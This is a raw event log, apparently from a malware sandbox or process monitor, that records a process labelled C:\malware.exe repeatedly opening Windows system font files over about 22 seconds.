29/2/2020 - 1:46:3.872Open1480C:\malware.exeC:\Windows\Fonts\estre.ttf
29/2/2020 - 1:46:3.965Open1480C:\malware.exeC:\Windows\Fonts\estre.ttf
29/2/2020 - 1:46:3.965Open1480C:\malware.exeC:\Windows\Fonts\euphemia.ttf
29/2/2020 - 1:46:3.965Open1480C:\malware.exeC:\Windows\Fonts\euphemia.ttf
29/2/2020 - 1:46:3.965Open1480C:\malware.exeC:\Windows\Fonts\euphemia.ttf
29/2/2020 - 1:46:4.106Open1480C:\malware.exeC:\Windows\Fonts\euphemia.ttf
29/2/2020 - 1:46:4.106Open1480C:\malware.exeC:\Windows\Fonts\gautami.ttf
29/2/2020 - 1:46:4.106Open1480C:\malware.exeC:\Windows\Fonts\gautami.ttf
29/2/2020 - 1:46:4.106Open1480C:\malware.exeC:\Windows\Fonts\gautami.ttf
29/2/2020 - 1:46:4.247Open1480C:\malware.exeC:\Windows\Fonts\gautami.ttf
29/2/2020 - 1:46:4.293Open1480C:\malware.exeC:\Windows\Fonts\gautamib.ttf
29/2/2020 - 1:46:4.293Open1480C:\malware.exeC:\Windows\Fonts\gautamib.ttf
29/2/2020 - 1:46:4.293Open1480C:\malware.exeC:\Windows\Fonts\gautamib.ttf
29/2/2020 - 1:46:4.387Open1480C:\malware.exeC:\Windows\Fonts\gautamib.ttf
29/2/2020 - 1:46:4.434Open1480C:\malware.exeC:\Windows\Fonts\Vani.ttf
29/2/2020 - 1:46:4.434Open1480C:\malware.exeC:\Windows\Fonts\Vani.ttf
29/2/2020 - 1:46:4.434Open1480C:\malware.exeC:\Windows\Fonts\Vani.ttf
29/2/2020 - 1:46:4.528Open1480C:\malware.exeC:\Windows\Fonts\Vani.ttf
29/2/2020 - 1:46:4.528Open1480C:\malware.exeC:\Windows\Fonts\Vanib.ttf
29/2/2020 - 1:46:4.528Open1480C:\malware.exeC:\Windows\Fonts\Vanib.ttf
29/2/2020 - 1:46:4.528Open1480C:\malware.exeC:\Windows\Fonts\Vanib.ttf
29/2/2020 - 1:46:4.622Open1480C:\malware.exeC:\Windows\Fonts\Vanib.ttf
29/2/2020 - 1:46:4.622Open1480C:\malware.exeC:\Windows\Fonts\gulim.ttc
29/2/2020 - 1:46:4.622Open1480C:\malware.exeC:\Windows\Fonts\gulim.ttc
29/2/2020 - 1:46:4.622Open1480C:\malware.exeC:\Windows\Fonts\gulim.ttc
29/2/2020 - 1:46:5.184Open1480C:\malware.exeC:\Windows\Fonts\gulim.ttc
29/2/2020 - 1:46:5.606Open1480C:\malware.exeC:\Windows\Fonts\gulim.ttc
29/2/2020 - 1:46:5.653Open1480C:\malware.exeC:\Windows\Fonts\gulim.ttc
29/2/2020 - 1:46:5.700Open1480C:\malware.exeC:\Windows\Fonts\gulim.ttc
29/2/2020 - 1:46:5.700Open1480C:\malware.exeC:\Windows\Fonts\impact.ttf
29/2/2020 - 1:46:5.700Open1480C:\malware.exeC:\Windows\Fonts\impact.ttf
29/2/2020 - 1:46:5.700Open1480C:\malware.exeC:\Windows\Fonts\impact.ttf
29/2/2020 - 1:46:5.793Open1480C:\malware.exeC:\Windows\Fonts\impact.ttf
29/2/2020 - 1:46:5.793Open1480C:\malware.exeC:\Windows\Fonts\iskpota.ttf
29/2/2020 - 1:46:5.793Open1480C:\malware.exeC:\Windows\Fonts\iskpota.ttf
29/2/2020 - 1:46:5.793Open1480C:\malware.exeC:\Windows\Fonts\iskpota.ttf
29/2/2020 - 1:46:5.934Open1480C:\malware.exeC:\Windows\Fonts\iskpota.ttf
29/2/2020 - 1:46:5.934Open1480C:\malware.exeC:\Windows\Fonts\iskpotab.ttf
29/2/2020 - 1:46:5.934Open1480C:\malware.exeC:\Windows\Fonts\iskpotab.ttf
29/2/2020 - 1:46:5.934Open1480C:\malware.exeC:\Windows\Fonts\iskpotab.ttf
29/2/2020 - 1:46:6.28Open1480C:\malware.exeC:\Windows\Fonts\iskpotab.ttf
29/2/2020 - 1:46:6.28Open1480C:\malware.exeC:\Windows\Fonts\kalinga.ttf
29/2/2020 - 1:46:6.28Open1480C:\malware.exeC:\Windows\Fonts\kalinga.ttf
29/2/2020 - 1:46:6.28Open1480C:\malware.exeC:\Windows\Fonts\kalinga.ttf
29/2/2020 - 1:46:6.122Open1480C:\malware.exeC:\Windows\Fonts\kalinga.ttf
29/2/2020 - 1:46:6.168Open1480C:\malware.exeC:\Windows\Fonts\kalingab.ttf
29/2/2020 - 1:46:6.168Open1480C:\malware.exeC:\Windows\Fonts\kalingab.ttf
29/2/2020 - 1:46:6.168Open1480C:\malware.exeC:\Windows\Fonts\kalingab.ttf
29/2/2020 - 1:46:6.262Open1480C:\malware.exeC:\Windows\Fonts\kalingab.ttf
29/2/2020 - 1:46:6.309Open1480C:\malware.exeC:\Windows\Fonts\kartika.ttf
29/2/2020 - 1:46:6.309Open1480C:\malware.exeC:\Windows\Fonts\kartika.ttf
29/2/2020 - 1:46:6.309Open1480C:\malware.exeC:\Windows\Fonts\kartika.ttf
29/2/2020 - 1:46:6.403Open1480C:\malware.exeC:\Windows\Fonts\kartika.ttf
29/2/2020 - 1:46:6.450Open1480C:\malware.exeC:\Windows\Fonts\kartikab.ttf
29/2/2020 - 1:46:6.450Open1480C:\malware.exeC:\Windows\Fonts\kartikab.ttf
29/2/2020 - 1:46:6.450Open1480C:\malware.exeC:\Windows\Fonts\kartikab.ttf
29/2/2020 - 1:46:6.543Open1480C:\malware.exeC:\Windows\Fonts\kartikab.ttf
29/2/2020 - 1:46:6.543Open1480C:\malware.exeC:\Windows\Fonts\KhmerUI.ttf
29/2/2020 - 1:46:6.543Open1480C:\malware.exeC:\Windows\Fonts\KhmerUI.ttf
29/2/2020 - 1:46:6.543Open1480C:\malware.exeC:\Windows\Fonts\KhmerUI.ttf
29/2/2020 - 1:46:6.637Open1480C:\malware.exeC:\Windows\Fonts\KhmerUI.ttf
29/2/2020 - 1:46:6.684Open1480C:\malware.exeC:\Windows\Fonts\KhmerUIb.ttf
29/2/2020 - 1:46:6.684Open1480C:\malware.exeC:\Windows\Fonts\KhmerUIb.ttf
29/2/2020 - 1:46:6.684Open1480C:\malware.exeC:\Windows\Fonts\KhmerUIb.ttf
29/2/2020 - 1:46:6.778Open1480C:\malware.exeC:\Windows\Fonts\KhmerUIb.ttf
29/2/2020 - 1:46:6.825Open1480C:\malware.exeC:\Windows\Fonts\LaoUI.ttf
29/2/2020 - 1:46:6.825Open1480C:\malware.exeC:\Windows\Fonts\LaoUI.ttf
29/2/2020 - 1:46:6.825Open1480C:\malware.exeC:\Windows\Fonts\LaoUI.ttf
29/2/2020 - 1:46:6.918Open1480C:\malware.exeC:\Windows\Fonts\LaoUI.ttf
29/2/2020 - 1:46:6.918Open1480C:\malware.exeC:\Windows\Fonts\LaoUIb.ttf
29/2/2020 - 1:46:6.918Open1480C:\malware.exeC:\Windows\Fonts\LaoUIb.ttf
29/2/2020 - 1:46:6.918Open1480C:\malware.exeC:\Windows\Fonts\LaoUIb.ttf
29/2/2020 - 1:46:7.12Open1480C:\malware.exeC:\Windows\Fonts\LaoUIb.ttf
29/2/2020 - 1:46:7.12Open1480C:\malware.exeC:\Windows\Fonts\latha.ttf
29/2/2020 - 1:46:7.12Open1480C:\malware.exeC:\Windows\Fonts\latha.ttf
29/2/2020 - 1:46:7.12Open1480C:\malware.exeC:\Windows\Fonts\latha.ttf
29/2/2020 - 1:46:7.106Open1480C:\malware.exeC:\Windows\Fonts\latha.ttf
29/2/2020 - 1:46:7.106Open1480C:\malware.exeC:\Windows\Fonts\lathab.ttf
29/2/2020 - 1:46:7.106Open1480C:\malware.exeC:\Windows\Fonts\lathab.ttf
29/2/2020 - 1:46:7.106Open1480C:\malware.exeC:\Windows\Fonts\lathab.ttf
29/2/2020 - 1:46:7.200Open1480C:\malware.exeC:\Windows\Fonts\lathab.ttf
29/2/2020 - 1:46:7.200Open1480C:\malware.exeC:\Windows\Fonts\lucon.ttf
29/2/2020 - 1:46:7.200Open1480C:\malware.exeC:\Windows\Fonts\lucon.ttf
29/2/2020 - 1:46:7.200Open1480C:\malware.exeC:\Windows\Fonts\lucon.ttf
29/2/2020 - 1:46:7.293Open1480C:\malware.exeC:\Windows\Fonts\lucon.ttf
29/2/2020 - 1:46:7.340Open1480C:\malware.exeC:\Windows\Fonts\malgun.ttf
29/2/2020 - 1:46:7.340Open1480C:\malware.exeC:\Windows\Fonts\malgun.ttf
29/2/2020 - 1:46:7.340Open1480C:\malware.exeC:\Windows\Fonts\malgun.ttf
29/2/2020 - 1:46:7.622Open1480C:\malware.exeC:\Windows\Fonts\malgun.ttf
29/2/2020 - 1:46:7.762Open1480C:\malware.exeC:\Windows\Fonts\malgunbd.ttf
29/2/2020 - 1:46:7.762Open1480C:\malware.exeC:\Windows\Fonts\malgunbd.ttf
29/2/2020 - 1:46:7.762Open1480C:\malware.exeC:\Windows\Fonts\malgunbd.ttf
29/2/2020 - 1:46:8.43Open1480C:\malware.exeC:\Windows\Fonts\malgunbd.ttf
29/2/2020 - 1:46:8.184Open1480C:\malware.exeC:\Windows\Fonts\mangal.ttf
29/2/2020 - 1:46:8.184Open1480C:\malware.exeC:\Windows\Fonts\mangal.ttf
29/2/2020 - 1:46:8.184Open1480C:\malware.exeC:\Windows\Fonts\mangal.ttf
29/2/2020 - 1:46:8.325Open1480C:\malware.exeC:\Windows\Fonts\mangal.ttf
29/2/2020 - 1:46:8.372Open1480C:\malware.exeC:\Windows\Fonts\mangalb.ttf
29/2/2020 - 1:46:8.372Open1480C:\malware.exeC:\Windows\Fonts\mangalb.ttf
29/2/2020 - 1:46:8.372Open1480C:\malware.exeC:\Windows\Fonts\mangalb.ttf
29/2/2020 - 1:46:8.465Open1480C:\malware.exeC:\Windows\Fonts\mangalb.ttf
29/2/2020 - 1:46:8.512Open1480C:\malware.exeC:\Windows\Fonts\meiryo.ttc
29/2/2020 - 1:46:8.512Open1480C:\malware.exeC:\Windows\Fonts\meiryo.ttc
29/2/2020 - 1:46:8.512Open1480C:\malware.exeC:\Windows\Fonts\meiryo.ttc
29/2/2020 - 1:46:9.215Open1480C:\malware.exeC:\Windows\Fonts\meiryo.ttc
29/2/2020 - 1:46:9.918Open1480C:\malware.exeC:\Windows\Fonts\meiryo.ttc
29/2/2020 - 1:46:10.293Open1480C:\malware.exeC:\Windows\Fonts\meiryo.ttc
29/2/2020 - 1:46:10.715Open1480C:\malware.exeC:\Windows\Fonts\meiryo.ttc
29/2/2020 - 1:46:11.90Open1480C:\malware.exeC:\Windows\Fonts\meiryob.ttc
29/2/2020 - 1:46:11.90Open1480C:\malware.exeC:\Windows\Fonts\meiryob.ttc
29/2/2020 - 1:46:11.90Open1480C:\malware.exeC:\Windows\Fonts\meiryob.ttc
29/2/2020 - 1:46:11.793Open1480C:\malware.exeC:\Windows\Fonts\meiryob.ttc
29/2/2020 - 1:46:12.497Open1480C:\malware.exeC:\Windows\Fonts\meiryob.ttc
29/2/2020 - 1:46:12.872Open1480C:\malware.exeC:\Windows\Fonts\meiryob.ttc
29/2/2020 - 1:46:13.293Open1480C:\malware.exeC:\Windows\Fonts\meiryob.ttc
29/2/2020 - 1:46:13.668Open1480C:\malware.exeC:\Windows\Fonts\himalaya.ttf
29/2/2020 - 1:46:13.668Open1480C:\malware.exeC:\Windows\Fonts\himalaya.ttf
29/2/2020 - 1:46:13.668Open1480C:\malware.exeC:\Windows\Fonts\himalaya.ttf
29/2/2020 - 1:46:13.809Open1480C:\malware.exeC:\Windows\Fonts\himalaya.ttf
29/2/2020 - 1:46:13.856Open1480C:\malware.exeC:\Windows\Fonts\msjh.ttf
29/2/2020 - 1:46:13.856Open1480C:\malware.exeC:\Windows\Fonts\msjh.ttf
29/2/2020 - 1:46:13.903Open1480C:\malware.exeC:\Windows\Fonts\msjh.ttf
29/2/2020 - 1:46:14.231Open1480C:\malware.exeC:\Windows\Fonts\msjh.ttf
29/2/2020 - 1:46:14.559Open1480C:\malware.exeC:\Windows\Fonts\msjhbd.ttf
29/2/2020 - 1:46:14.559Open1480C:\malware.exeC:\Windows\Fonts\msjhbd.ttf
29/2/2020 - 1:46:14.559Open1480C:\malware.exeC:\Windows\Fonts\msjhbd.ttf
29/2/2020 - 1:46:14.887Open1480C:\malware.exeC:\Windows\Fonts\msjhbd.ttf
29/2/2020 - 1:46:15.168Open1480C:\malware.exeC:\Windows\Fonts\msyh.ttf
29/2/2020 - 1:46:15.168Open1480C:\malware.exeC:\Windows\Fonts\msyh.ttf
29/2/2020 - 1:46:15.168Open1480C:\malware.exeC:\Windows\Fonts\msyh.ttf
29/2/2020 - 1:46:15.543Open1480C:\malware.exeC:\Windows\Fonts\msyh.ttf
29/2/2020 - 1:46:15.918Open1480C:\malware.exeC:\Windows\Fonts\msyhbd.ttf
29/2/2020 - 1:46:15.918Open1480C:\malware.exeC:\Windows\Fonts\msyhbd.ttf
29/2/2020 - 1:46:15.918Open1480C:\malware.exeC:\Windows\Fonts\msyhbd.ttf
29/2/2020 - 1:46:16.340Open1480C:\malware.exeC:\Windows\Fonts\msyhbd.ttf
29/2/2020 - 1:46:16.668Open1480C:\malware.exeC:\Windows\Fonts\mingliu.ttc
29/2/2020 - 1:46:16.668Open1480C:\malware.exeC:\Windows\Fonts\mingliu.ttc
29/2/2020 - 1:46:16.668Open1480C:\malware.exeC:\Windows\Fonts\mingliu.ttc
29/2/2020 - 1:46:17.184Open1480C:\malware.exeC:\Windows\Fonts\mingliu.ttc
29/2/2020 - 1:46:17.559Open1480C:\malware.exeC:\Windows\Fonts\mingliu.ttc
29/2/2020 - 1:46:17.559Open1480C:\malware.exeC:\Windows\Fonts\mingliu.ttc
29/2/2020 - 1:46:17.559Open1480C:\malware.exeC:\Windows\Fonts\mingliub.ttc
29/2/2020 - 1:46:17.559Open1480C:\malware.exeC:\Windows\Fonts\mingliub.ttc
29/2/2020 - 1:46:17.559Open1480C:\malware.exeC:\Windows\Fonts\mingliub.ttc
29/2/2020 - 1:46:18.75Open1480C:\malware.exeC:\Windows\Fonts\mingliub.ttc
29/2/2020 - 1:46:18.497Open1480C:\malware.exeC:\Windows\Fonts\mingliub.ttc
29/2/2020 - 1:46:18.497Open1480C:\malware.exeC:\Windows\Fonts\mingliub.ttc
29/2/2020 - 1:46:18.497Open1480C:\malware.exeC:\Windows\Fonts\monbaiti.ttf
29/2/2020 - 1:46:18.497Open1480C:\malware.exeC:\Windows\Fonts\monbaiti.ttf
29/2/2020 - 1:46:18.497Open1480C:\malware.exeC:\Windows\Fonts\monbaiti.ttf
29/2/2020 - 1:46:18.637Open1480C:\malware.exeC:\Windows\Fonts\monbaiti.ttf
29/2/2020 - 1:46:18.731Open1480C:\malware.exeC:\Windows\Fonts\msgothic.ttc
29/2/2020 - 1:46:18.731Open1480C:\malware.exeC:\Windows\Fonts\msgothic.ttc
29/2/2020 - 1:46:18.731Open1480C:\malware.exeC:\Windows\Fonts\msgothic.ttc
29/2/2020 - 1:46:19.153Open1480C:\malware.exeC:\Windows\Fonts\msgothic.ttc
29/2/2020 - 1:46:19.481Open1480C:\malware.exeC:\Windows\Fonts\msgothic.ttc
29/2/2020 - 1:46:19.622Open1480C:\malware.exeC:\Windows\Fonts\msgothic.ttc
29/2/2020 - 1:46:19.715Open1480C:\malware.exeC:\Windows\Fonts\msmincho.ttc
29/2/2020 - 1:46:19.715Open1480C:\malware.exeC:\Windows\Fonts\msmincho.ttc
29/2/2020 - 1:46:19.715Open1480C:\malware.exeC:\Windows\Fonts\msmincho.ttc
29/2/2020 - 1:46:20.90Open1480C:\malware.exeC:\Windows\Fonts\msmincho.ttc
29/2/2020 - 1:46:20.418Open1480C:\malware.exeC:\Windows\Fonts\msmincho.ttc
29/2/2020 - 1:46:20.512Open1480C:\malware.exeC:\Windows\Fonts\mvboli.ttf
29/2/2020 - 1:46:20.512Open1480C:\malware.exeC:\Windows\Fonts\mvboli.ttf
29/2/2020 - 1:46:20.512Open1480C:\malware.exeC:\Windows\Fonts\mvboli.ttf
29/2/2020 - 1:46:20.606Open1480C:\malware.exeC:\Windows\Fonts\mvboli.ttf
29/2/2020 - 1:46:20.606Open1480C:\malware.exeC:\Windows\Fonts\ntailu.ttf
29/2/2020 - 1:46:20.606Open1480C:\malware.exeC:\Windows\Fonts\ntailu.ttf
29/2/2020 - 1:46:20.606Open1480C:\malware.exeC:\Windows\Fonts\ntailu.ttf
29/2/2020 - 1:46:20.700Open1480C:\malware.exeC:\Windows\Fonts\ntailu.ttf
29/2/2020 - 1:46:20.700Open1480C:\malware.exeC:\Windows\Fonts\ntailub.ttf
29/2/2020 - 1:46:20.700Open1480C:\malware.exeC:\Windows\Fonts\ntailub.ttf
29/2/2020 - 1:46:20.700Open1480C:\malware.exeC:\Windows\Fonts\ntailub.ttf
29/2/2020 - 1:46:20.793Open1480C:\malware.exeC:\Windows\Fonts\ntailub.ttf
29/2/2020 - 1:46:20.793Open1480C:\malware.exeC:\Windows\Fonts\nyala.ttf
29/2/2020 - 1:46:20.793Open1480C:\malware.exeC:\Windows\Fonts\nyala.ttf
29/2/2020 - 1:46:20.793Open1480C:\malware.exeC:\Windows\Fonts\nyala.ttf
29/2/2020 - 1:46:20.934Open1480C:\malware.exeC:\Windows\Fonts\nyala.ttf
29/2/2020 - 1:46:21.28Open1480C:\malware.exeC:\Windows\Fonts\phagspa.ttf
29/2/2020 - 1:46:21.28Open1480C:\malware.exeC:\Windows\Fonts\phagspa.ttf
29/2/2020 - 1:46:21.28Open1480C:\malware.exeC:\Windows\Fonts\phagspa.ttf
29/2/2020 - 1:46:21.168Open1480C:\malware.exeC:\Windows\Fonts\phagspa.ttf
29/2/2020 - 1:46:21.215Open1480C:\malware.exeC:\Windows\Fonts\phagspab.ttf
29/2/2020 - 1:46:21.215Open1480C:\malware.exeC:\Windows\Fonts\phagspab.ttf
29/2/2020 - 1:46:21.215Open1480C:\malware.exeC:\Windows\Fonts\phagspab.ttf
29/2/2020 - 1:46:21.356Open1480C:\malware.exeC:\Windows\Fonts\phagspab.ttf
29/2/2020 - 1:46:21.356Open1480C:\malware.exeC:\Windows\Fonts\plantc.ttf
29/2/2020 - 1:46:21.356Open1480C:\malware.exeC:\Windows\Fonts\plantc.ttf
29/2/2020 - 1:46:21.356Open1480C:\malware.exeC:\Windows\Fonts\plantc.ttf
29/2/2020 - 1:46:21.450Open1480C:\malware.exeC:\Windows\Fonts\plantc.ttf
29/2/2020 - 1:46:21.450Open1480C:\malware.exeC:\Windows\Fonts\raavi.ttf
29/2/2020 - 1:46:21.450Open1480C:\malware.exeC:\Windows\Fonts\raavi.ttf
29/2/2020 - 1:46:21.450Open1480C:\malware.exeC:\Windows\Fonts\raavi.ttf
29/2/2020 - 1:46:21.543Open1480C:\malware.exeC:\Windows\Fonts\raavi.ttf
29/2/2020 - 1:46:21.543Open1480C:\malware.exeC:\Windows\Fonts\raavib.ttf
29/2/2020 - 1:46:21.543Open1480C:\malware.exeC:\Windows\Fonts\raavib.ttf
29/2/2020 - 1:46:21.543Open1480C:\malware.exeC:\Windows\Fonts\raavib.ttf
29/2/2020 - 1:46:21.637Open1480C:\malware.exeC:\Windows\Fonts\raavib.ttf
29/2/2020 - 1:46:21.637Open1480C:\malware.exeC:\Windows\Fonts\segoesc.ttf
29/2/2020 - 1:46:21.637Open1480C:\malware.exeC:\Windows\Fonts\segoesc.ttf
29/2/2020 - 1:46:21.637Open1480C:\malware.exeC:\Windows\Fonts\segoesc.ttf
29/2/2020 - 1:46:21.778Open1480C:\malware.exeC:\Windows\Fonts\segoesc.ttf
29/2/2020 - 1:46:21.918Open1480C:\malware.exeC:\Windows\Fonts\segoescb.ttf
29/2/2020 - 1:46:21.918Open1480C:\malware.exeC:\Windows\Fonts\segoescb.ttf
29/2/2020 - 1:46:21.918Open1480C:\malware.exeC:\Windows\Fonts\segoescb.ttf
29/2/2020 - 1:46:22.59Open1480C:\malware.exeC:\Windows\Fonts\segoescb.ttf
29/2/2020 - 1:46:22.200Open1480C:\malware.exeC:\Windows\Fonts\segoeui.ttf
29/2/2020 - 1:46:22.200Open1480C:\malware.exeC:\Windows\Fonts\segoeui.ttf
29/2/2020 - 1:46:22.200Open1480C:\malware.exeC:\Windows\Fonts\segoeui.ttf
29/2/2020 - 1:46:22.200Open1480C:\malware.exeC:\Windows\Fonts\segoeui.ttf
29/2/2020 - 1:46:22.200Open1480C:\malware.exeC:\Windows\Fonts\segoeuib.ttf
29/2/2020 - 1:46:22.200Open1480C:\malware.exeC:\Windows\Fonts\segoeuib.ttf
29/2/2020 - 1:46:22.200Open1480C:\malware.exeC:\Windows\Fonts\segoeuib.ttf
29/2/2020 - 1:46:22.247Open1480C:\malware.exeC:\Windows\Fonts\segoeuib.ttf
29/2/2020 - 1:46:22.247Open1480C:\malware.exeC:\Windows\Fonts\segoeuii.ttf
29/2/2020 - 1:46:22.247Open1480C:\malware.exeC:\Windows\Fonts\segoeuii.ttf
29/2/2020 - 1:46:22.247Open1480C:\malware.exeC:\Windows\Fonts\segoeuii.ttf
29/2/2020 - 1:46:22.293Open1480C:\malware.exeC:\Windows\Fonts\segoeuii.ttf
29/2/2020 - 1:46:22.293Open1480C:\malware.exeC:\Windows\Fonts\segoeuiz.ttf
29/2/2020 - 1:46:22.293Open1480C:\malware.exeC:\Windows\Fonts\segoeuiz.ttf
29/2/2020 - 1:46:22.293Open1480C:\malware.exeC:\Windows\Fonts\segoeuiz.ttf
29/2/2020 - 1:46:22.434Open1480C:\malware.exeC:\Windows\Fonts\segoeuiz.ttf
29/2/2020 - 1:46:22.528Open1480C:\malware.exeC:\Windows\Fonts\seguisb.ttf
29/2/2020 - 1:46:22.528Open1480C:\malware.exeC:\Windows\Fonts\seguisb.ttf
29/2/2020 - 1:46:22.528Open1480C:\malware.exeC:\Windows\Fonts\seguisb.ttf
29/2/2020 - 1:46:22.528Open1480C:\malware.exeC:\Windows\Fonts\seguisb.ttf
29/2/2020 - 1:46:22.528Open1480C:\malware.exeC:\Windows\Fonts\segoeuil.ttf
29/2/2020 - 1:46:22.528Open1480C:\malware.exeC:\Windows\Fonts\segoeuil.ttf
29/2/2020 - 1:46:22.528Open1480C:\malware.exeC:\Windows\Fonts\segoeuil.ttf
29/2/2020 - 1:46:22.528Open1480C:\malware.exeC:\Windows\Fonts\segoeuil.ttf
29/2/2020 - 1:46:22.528Open1480C:\malware.exeC:\Windows\Fonts\seguisym.ttf
29/2/2020 - 1:46:22.528Open1480C:\malware.exeC:\Windows\Fonts\seguisym.ttf
29/2/2020 - 1:46:22.528Open1480C:\malware.exeC:\Windows\Fonts\seguisym.ttf
29/2/2020 - 1:46:22.528Open1480C:\malware.exeC:\Windows\Fonts\seguisym.ttf
29/2/2020 - 1:46:22.528Open1480C:\malware.exeC:\Windows\Fonts\shruti.ttf
29/2/2020 - 1:46:22.528Open1480C:\malware.exeC:\Windows\Fonts\shruti.ttf
29/2/2020 - 1:46:22.528Open1480C:\malware.exeC:\Windows\Fonts\shruti.ttf
29/2/2020 - 1:46:22.668Open1480C:\malware.exeC:\Windows\Fonts\shruti.ttf
29/2/2020 - 1:46:22.715Open1480C:\malware.exeC:\Windows\Fonts\shrutib.ttf
29/2/2020 - 1:46:22.715Open1480C:\malware.exeC:\Windows\Fonts\shrutib.ttf
29/2/2020 - 1:46:22.715Open1480C:\malware.exeC:\Windows\Fonts\shrutib.ttf
29/2/2020 - 1:46:22.856Open1480C:\malware.exeC:\Windows\Fonts\shrutib.ttf
29/2/2020 - 1:46:22.950Open1480C:\malware.exeC:\Windows\Fonts\simsun.ttc
29/2/2020 - 1:46:22.950Open1480C:\malware.exeC:\Windows\Fonts\simsun.ttc
29/2/2020 - 1:46:22.950Open1480C:\malware.exeC:\Windows\Fonts\simsun.ttc
29/2/2020 - 1:46:23.43Open1480C:\malware.exeC:\Windows\Fonts\simsun.ttc
29/2/2020 - 1:46:23.137Open1480C:\malware.exeC:\Windows\Fonts\simsun.ttc
29/2/2020 - 1:46:23.137Open1480C:\malware.exeC:\Windows\Fonts\simsunb.ttf
29/2/2020 - 1:46:23.137Open1480C:\malware.exeC:\Windows\Fonts\simsunb.ttf
29/2/2020 - 1:46:23.137Open1480C:\malware.exeC:\Windows\Fonts\simsunb.ttf
29/2/2020 - 1:46:23.465Open1480C:\malware.exeC:\Windows\Fonts\simsunb.ttf
29/2/2020 - 1:46:23.653Open1480C:\malware.exeC:\Windows\Fonts\sylfaen.ttf
29/2/2020 - 1:46:23.653Open1480C:\malware.exeC:\Windows\Fonts\sylfaen.ttf
29/2/2020 - 1:46:23.653Open1480C:\malware.exeC:\Windows\Fonts\sylfaen.ttf
29/2/2020 - 1:46:23.747Open1480C:\malware.exeC:\Windows\Fonts\sylfaen.ttf
29/2/2020 - 1:46:23.747Open1480C:\malware.exeC:\Windows\Fonts\taile.ttf
29/2/2020 - 1:46:23.747Open1480C:\malware.exeC:\Windows\Fonts\taile.ttf
29/2/2020 - 1:46:23.747Open1480C:\malware.exeC:\Windows\Fonts\taile.ttf
29/2/2020 - 1:46:23.840Open1480C:\malware.exeC:\Windows\Fonts\taile.ttf
29/2/2020 - 1:46:23.840Open1480C:\malware.exeC:\Windows\Fonts\taileb.ttf
29/2/2020 - 1:46:23.840Open1480C:\malware.exeC:\Windows\Fonts\taileb.ttf
29/2/2020 - 1:46:23.840Open1480C:\malware.exeC:\Windows\Fonts\taileb.ttf
29/2/2020 - 1:46:23.934Open1480C:\malware.exeC:\Windows\Fonts\taileb.ttf
29/2/2020 - 1:46:23.934Open1480C:\malware.exeC:\Windows\Fonts\times.ttf
29/2/2020 - 1:46:23.934Open1480C:\malware.exeC:\Windows\Fonts\times.ttf
29/2/2020 - 1:46:23.934Open1480C:\malware.exeC:\Windows\Fonts\times.ttf
29/2/2020 - 1:46:23.934Open1480C:\malware.exeC:\Windows\Fonts\times.ttf
29/2/2020 - 1:46:23.934Open1480C:\malware.exeC:\Windows\Fonts\timesi.ttf
29/2/2020 - 1:46:23.934Open1480C:\malware.exeC:\Windows\Fonts\timesi.ttf
29/2/2020 - 1:46:23.934Open1480C:\malware.exeC:\Windows\Fonts\timesi.ttf
29/2/2020 - 1:46:24.75Open1480C:\malware.exeC:\Windows\Fonts\timesi.ttf
29/2/2020 - 1:46:24.168Open1480C:\malware.exeC:\Windows\Fonts\timesbd.ttf
29/2/2020 - 1:46:24.168Open1480C:\malware.exeC:\Windows\Fonts\timesbd.ttf
29/2/2020 - 1:46:24.168Open1480C:\malware.exeC:\Windows\Fonts\timesbd.ttf
29/2/2020 - 1:46:24.215Open1480C:\malware.exeC:\Windows\Fonts\timesbd.ttf
29/2/2020 - 1:46:24.215Open1480C:\malware.exeC:\Windows\Fonts\timesbi.ttf
29/2/2020 - 1:46:24.215Open1480C:\malware.exeC:\Windows\Fonts\timesbi.ttf
29/2/2020 - 1:46:24.215Open1480C:\malware.exeC:\Windows\Fonts\timesbi.ttf
29/2/2020 - 1:46:24.356Open1480C:\malware.exeC:\Windows\Fonts\timesbi.ttf
29/2/2020 - 1:46:24.450Open1480C:\malware.exeC:\Windows\Fonts\tunga.ttf
29/2/2020 - 1:46:24.450Open1480C:\malware.exeC:\Windows\Fonts\tunga.ttf
29/2/2020 - 1:46:24.450Open1480C:\malware.exeC:\Windows\Fonts\tunga.ttf
29/2/2020 - 1:46:24.543Open1480C:\malware.exeC:\Windows\Fonts\tunga.ttf
29/2/2020 - 1:46:24.543Open1480C:\malware.exeC:\Windows\Fonts\tungab.ttf
29/2/2020 - 1:46:24.543Open1480C:\malware.exeC:\Windows\Fonts\tungab.ttf
29/2/2020 - 1:46:24.543Open1480C:\malware.exeC:\Windows\Fonts\tungab.ttf
29/2/2020 - 1:46:24.637Open1480C:\malware.exeC:\Windows\Fonts\tungab.ttf
29/2/2020 - 1:46:24.637Open1480C:\malware.exeC:\Windows\Fonts\vrinda.ttf
29/2/2020 - 1:46:24.637Open1480C:\malware.exeC:\Windows\Fonts\vrinda.ttf
29/2/2020 - 1:46:24.637Open1480C:\malware.exeC:\Windows\Fonts\vrinda.ttf
29/2/2020 - 1:46:24.731Open1480C:\malware.exeC:\Windows\Fonts\vrinda.ttf
29/2/2020 - 1:46:24.731Open1480C:\malware.exeC:\Windows\Fonts\vrindab.ttf
29/2/2020 - 1:46:24.731Open1480C:\malware.exeC:\Windows\Fonts\vrindab.ttf
29/2/2020 - 1:46:24.731Open1480C:\malware.exeC:\Windows\Fonts\vrindab.ttf
29/2/2020 - 1:46:24.825Open1480C:\malware.exeC:\Windows\Fonts\vrindab.ttf
29/2/2020 - 1:46:24.825Open1480C:\malware.exeC:\Windows\Fonts\Shonar.ttf
29/2/2020 - 1:46:24.825Open1480C:\malware.exeC:\Windows\Fonts\Shonar.ttf
29/2/2020 - 1:46:24.825Open1480C:\malware.exeC:\Windows\Fonts\Shonar.ttf
29/2/2020 - 1:46:24.918Open1480C:\malware.exeC:\Windows\Fonts\Shonar.ttf
29/2/2020 - 1:46:24.918Open1480C:\malware.exeC:\Windows\Fonts\Shonarb.ttf
29/2/2020 - 1:46:24.918Open1480C:\malware.exeC:\Windows\Fonts\Shonarb.ttf
29/2/2020 - 1:46:24.918Open1480C:\malware.exeC:\Windows\Fonts\Shonarb.ttf
29/2/2020 - 1:46:25.59Open1480C:\malware.exeC:\Windows\Fonts\Shonarb.ttf
29/2/2020 - 1:46:25.59Open1480C:\malware.exeC:\Windows\Fonts\msyi.ttf
29/2/2020 - 1:46:25.59Open1480C:\malware.exeC:\Windows\Fonts\msyi.ttf
29/2/2020 - 1:46:25.59Open1480C:\malware.exeC:\Windows\Fonts\msyi.ttf
29/2/2020 - 1:46:25.200Open1480C:\malware.exeC:\Windows\Fonts\msyi.ttf
